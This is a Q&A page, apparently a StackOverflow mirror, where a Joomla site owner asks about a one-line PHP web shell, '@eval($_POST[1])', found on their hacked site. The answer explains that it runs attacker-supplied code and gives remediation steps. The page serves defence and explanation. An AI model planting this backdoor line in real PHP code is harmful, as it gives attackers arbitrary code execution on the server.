What is the meaning of @eval($_POST[1])

php joomla eval joomla3.0
10,838

With this line of code, the hacker will be able to execute any code he wants. Therefore this code will have the power to read, update or delete any data he wants.

We don't know yet what code he will choose to execute because the code will be passed as a $_POST argument. The $_POST[1] argument will contain a string of executable code. Then, eval() will be called with this argument to execute that code.

When the hacker will call your page, passing it some code as a POST argument, he will be performing an attack that is called code injection.

Now that you know that, you have to figure out:

  1. What damage has already been done in order to undo it, if possible?
  2. What security breach allowed the hacker to add the "eval" code to your code base?

If you decide to restore a backup, make sure the "eval" code is not already in your backup. Then, solve problem #2 because the hacker will probably just re-use the same security breach to restore his hack. Even if your backup is clean, the security breach will still be there.

Share:
10,838
Pritesh Mahajan
Author by

Pritesh Mahajan

I have 6+ Years of experiences in Core PHP, Joomla, Wordpress, Zoho. I have done more than 50 project in Joomla, wordpdress. Currently i am working on MEAN Stack.Node and MongoDB is my favourite technology. According to time i am trying to upgrading my self.

Updated on June 09, 2022

Comments

  • Pritesh Mahajan
    Pritesh Mahajan almost 2 years

    My joomla site is hacked and i got a file in library folder that is reads.php file. When i open this file there is write only a line that is 

    <?php @eval($_POST[1]); ?>

    I do not understand what data hacker will get this line. Please suggest me .

Recents

Why Is PNG file with Drop Shadow in Flutter Web App Grainy?
How to troubleshoot crashes detected by Google Play Store for Flutter app
Cupertino DateTime picker interfering with scroll behaviour
Why does awk -F work for most letters, but not for the letter "t"?
Flutter change focus color and icon color but not works
How to print and connect to printer using flutter desktop via usb?
Critical issues have been reported with the following SDK versions: com.google.android.gms:play-services-safetynet:17.0.0
Flutter Dart - get localized country name from country code
navigatorState is null when using pushNamed Navigation onGenerateRoutes of GetMaterialPage
Android Sdk manager not found- Flutter doctor error
Flutter Laravel Push Notification without using any third party like(firebase,onesignal..etc)
How to change the color of ElevatedButton when entering text in TextField

Related

Getting Error on Joomla: Failed to Read Session Data and Application Instantiation Error
How to disable front-end login component in Joomla 3?
URL rewriting in joomla 3.0 after enabling url rewriting YES But gives an error
Load Joomla 3.x Framework and Modules in external PHP file
Joomla 3.0 DS does not work(Use of undefined constant DS)
How to solve Joomla Error " The template for this display is not available."
Forcing file download in PHP - inside Joomla framework
Joomla 3 get the menu title
eval php shell hack
echo php variable inside jQuery function